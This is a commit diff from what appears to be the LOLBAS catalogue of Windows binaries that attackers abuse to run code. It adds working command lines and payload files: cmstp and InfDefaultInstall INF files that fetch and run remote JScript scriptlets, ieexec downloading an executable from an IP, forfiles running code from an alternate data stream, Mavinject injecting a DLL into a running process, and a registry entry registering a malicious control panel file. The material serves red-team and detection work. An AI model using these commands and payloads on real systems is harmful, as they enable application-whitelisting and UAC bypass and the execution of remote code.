Added some more

LOLBins.md

@@ -14,7 +14,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
 [Ie4unit.exe](OSBinaries/Ie4unit.md)     
 [Infdefaultinstall.exe](OSBinaries/Infdefaultinstall.md)    
 [Installutil.exe](OSBinaries/Installutil.md)      
-[Mavinject32.exe](OSBinaries/Mavinject32.md)       
+[Mavinject.exe](OSBinaries/Mavinject.md)       
 [Msbuild.exe](OSBinaries/Msbuild.md)    
 [Msdt.exe](OSBinaries/Msdt.md)     
 [Mshta.exe](OSBinaries/Mshta.md)     

OSBinaries/Atbroker.md

@@ -7,4 +7,22 @@ ATBroker.exe /start malware
 ```
 
 Acknowledgements:
-* Adam - @hexacorn
+* Adam - @hexacorn
+
+Code sample:
+* Missing
+
+Resources:
+* http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
+
+Full path:
+```
+C:\Windows\System32\Atbroker.exe
+C:\Windows\SysWOW64\Atbroker.exe
+```
+
+Notes:
+Not certain if it works on Windows 10.
+
+
+ 

OSBinaries/Cmstp.md

@@ -1,11 +1,37 @@
-## CMSTP.exe
+## Cmstp.exe
 
-* Functions: Execute
+* Functions: Execute, UACBypass
 
 ```
-cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
+cmstp.exe /ni /s c:\cmstp\CorpVPN.inf     
+
+cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payloads/Cmstp.inf     
 ```
 
 Acknowledgements:
 * Oddvar Moe - @oddvarmoe
-* Nick Tyrer - @NickTyrer
+* Nick Tyrer - @NickTyrer
+
+Code sample:
+* [Cmstp.inf](Payloads/Cmstp.inf)    
+* [Cmstp_calc.sct](Payloads/Cmstp_calc.sct)
+
+Resources:
+* https://twitter.com/NickTyrer/status/958450014111633408    
+* https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80     
+* https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e
+* https://oddvar.moe/2017/08/15/research-on-cmstp-exe/
+* https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1 (UAC Bypass)
+* https://github.com/hfiref0x/UACME
+
+Full path:
+```
+C:\Windows\system32\cmstp.exe
+C:\Windows\sysWOW64\cmstp.exe
+```
+
+Notes:
+
+
+
+ 

OSBinaries/Control.md

@@ -1,16 +1,34 @@
 ## Control.exe
 
-* Functions: Execute
+* Functions: Execute, Read ADS
 
 ```
 control.exe c:\windows\tasks\file.txt:evil.dll
-
-control.exe 
-(Add registry in HKCU\Software\Microsoft\Windows\currentversion\controlpanel\CPLS to manipulate)
 ```
 
 Acknowledgements:
 * Jimmy - @bohops
-   
-   
-   
+
+Code sample:
+* 
+
+Resources:
+* https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
+* https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/
+* https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/
+* https://twitter.com/bohops/status/955659561008017409
+
+Full path:
+```
+C:\Windows\system32\control.exe    
+C:\Windows\sysWOW64\control.exe     
+```
+
+Notes:
+Add registry in HKCU\Software\Microsoft\Windows\currentversion\controlpanel\CPLS to manipulate.
+```
+reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cpls"
+/v EvilCPL.cpl /t REG_SZ /d "C:\Folder\EvilCPL.cpl"
+```
+
+ 

OSBinaries/Forfiles.md

@@ -1,10 +1,32 @@
 ## Forfiles.exe
 
-* Functions: Execute
+* Functions: Execute, Read ADS
 
 ```
-forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
+forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe    
+forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"    
 ```
 
 Acknowledgements:
 * Eric - @vector_sec
+* Oddvar Moe - @oddvarmoe
+
+Code sample:
+* 
+
+Resources:
+* https://twitter.com/vector_sec/status/896049052642533376
+* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
+* https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
+
+Full path:
+```
+C:\Windows\system32\forfiles.exe
+C:\Windows\sysWOW64\forfiles.exe
+```
+
+Notes:
+
+
+
+ 

OSBinaries/Ie4unit.md

@@ -1,12 +1,29 @@
-## ie4unit.exe
+## Ie4unit.exe
 
 * Functions: Execute
 
 ```
-ie4unit.exe -BaseSettings
-(copy out ie4unit.exe and ieuinit.inf - add SCT in the MSIE4RegisterOCX.Windows7 section)
+ie4unit.exe -BaseSettings    
 ```
 
 Acknowledgements:
 * Jimmy - @bohops
-   
+
+Code sample:
+* 
+
+Resources:
+* https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
+
+Full path:
+```
+c:\windows\system32\ie4unit.exe    
+c:\windows\sysWOW64\ie4unit.exe    
+c:\windows\system32\ieuinit.inf    
+c:\windows\sysWOW64\ieuinit.inf    
+```
+
+Notes:
+copy out ie4unit.exe and ieuinit.inf - add SCT in the MSIE4RegisterOCX.Windows7 section
+
+ 

OSBinaries/Ieexec.md

@@ -7,4 +7,22 @@ ieexec.exe http://x.x.x.x:8080/bypass.exe
 ```
 
 Acknowledgements:
-* ?
+* Casey Smith - @subtee
+
+Code sample:
+* 
+
+Resources:
+* https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
+
+Full path:
+```
+c:\windows\system32\ieexec.exe
+c:\windows\sysWOW64\ieexec.exe
+```
+
+Notes:
+
+
+
+ 

OSBinaries/InfDefaultInstall.md

@@ -3,8 +3,29 @@
 * Functions: Execute
 
 ```
-InfDefaultInstall.exe shady.inf
+InfDefaultInstall.exe Infdefaultinstall.inf
 ```
 
 Acknowledgements:
-* Kyle Hanslovan - @kylehanslovan
+* Kyle Hanslovan - @kylehanslovan
+
+Code sample:
+* [Infdefaultinstall.inf](Payload/Infdefaultinstall.inf)
+* [Infdefaultinstall_calc.sct](Payload/Infdefaultinstall_calc.sct)
+
+Resources:
+* https://twitter.com/KyleHanslovan/status/911997635455852544     
+* https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a      
+* https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/
+
+Full path:
+```
+c:\windows\system32\Infdefaultinstall.exe
+c:\windows\sysWOW64\Infdefaultinstall.exe
+```
+
+Notes:
+Some specific details about the binary file.
+
+
+ 

OSBinaries/Installutil.md

@@ -8,3 +8,31 @@ InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
 
 Acknowledgements:
 * Casey Smith - @subtee
+
+
+Code sample:
+* [AllTheThingsX64.dll - Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)
+* [AllTheThingsX32.dll - Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx32.dll)
+
+Resources:
+* https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/       
+* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12      
+* http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html      
+* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md      
+* https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/      
+* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/      
+
+Full path:
+```
+C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
+C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
+C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
+```
+
+Notes:
+
+
+
+ 
+

OSBinaries/Mavinject.md

@@ -0,0 +1,32 @@
+## Mavinject.exe
+
+* Functions: Execute
+
+```
+MavInject.exe <PID> /INJECTRUNNING <PATH DLL>
+
+MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll>
+```
+
+Acknowledgements:
+* Giuseppe N3mes1s - @gN3mes1s
+* Adam - @hexacorn
+   
+Code sample:
+* 
+
+Resources:
+* https://twitter.com/gN3mes1s/status/941315826107510784     
+* https://twitter.com/Hexacorn/status/776122138063409152     
+
+Full path:
+```
+C:\Windows\System32\mavinject.exe
+C:\Windows\SysWOW64\mavinject.exe
+```
+
+Notes:
+
+
+
+ 

OSBinaries/Mavinject32.md

@@ -1,14 +0,0 @@
-## Mavinject32.exe
-
-* Functions: Execute
-
-```
-MavInject32.exe <PID> /INJECTRUNNING <PATH DLL>
-
-MavInject32.exe 3110 /INJECTRUNNING c:\folder\evil.dll>
-```
-
-Acknowledgements:
-* Giuseppe N3mes1s - @gN3mes1s
-* Adam - @hexacorn
-   

OSBinaries/Payload/Cmstp.inf

@@ -0,0 +1,14 @@
+[version]
+Signature=$chicago$
+AdvancedINF=2.5
+
+[DefaultInstall_SingleUser]
+UnRegisterOCXs=UnRegisterOCXSection
+
+[UnRegisterOCXSection]
+%11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp_calc.sct
+
+[Strings]
+AppAct = "SOFTWARE\Microsoft\Connection Manager"
+ServiceName="Yay"
+ShortSvcName="Yay"

OSBinaries/Payload/Cmstp_calc.sct

@@ -0,0 +1,23 @@
+<?XML version="1.0"?>
+<scriptlet>
+<registration 
+    progid="PoC"
+    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
+	<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->
+
+	<!-- .sct files when downloaded, are executed from a path like this -->
+	<!-- Please Note, file extenstion does not matter -->
+	<!-- Though, the name and extension are arbitary.. -->
+	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
+	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
+  	<!-- You can either execute locally, or from a url -->
+	<script language="JScript">
+		<![CDATA[
+	    		// calc.exe should launch, this could be any arbitrary code.
+      	   		// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
+			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");	
+	
+		]]>
+</script>
+</registration>
+</scriptlet>

OSBinaries/Payload/Infdefaultinstall.inf

@@ -0,0 +1,8 @@
+[Version] 
+Signature=$CHICAGO$
+
+[DefaultInstall]
+UnregisterDlls = Squiblydoo
+
+[Squiblydoo]
+11,,scrobj.dll,2,60,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Infdefaultinstall_calc.sct

OSBinaries/Payload/Infdefaultinstall_calc.sct

@@ -0,0 +1,16 @@
+<?XML version="1.0"?>
+<scriptlet>
+<registration 
+    progid="PoC"
+    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
+	<!-- Proof Of Concept - Casey Smith @subTee -->
+	<!--  License: BSD3-Clause -->
+	<script language="JScript">
+		<![CDATA[
+	
+			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+	
+		]]>
+</script>
+</registration>
+</scriptlet>

README.md

@@ -1,9 +1,10 @@
 # Living Off The Land Binaries and Scripts
 
 The goal of these lists are to document every binary and script that can be used for other purposes than they are designed to. 
+Every binary and script has it's own .md file in the subfolders. That way I should be easier to maintain and reuse. 
 
 There are two different lists.
 
-[LOLBins](LOLBins.md)
-[LOLScripts](LOLScripts.md)
+* [LOLBins](LOLBins.md)    
+* [LOLScripts](LOLScripts.md)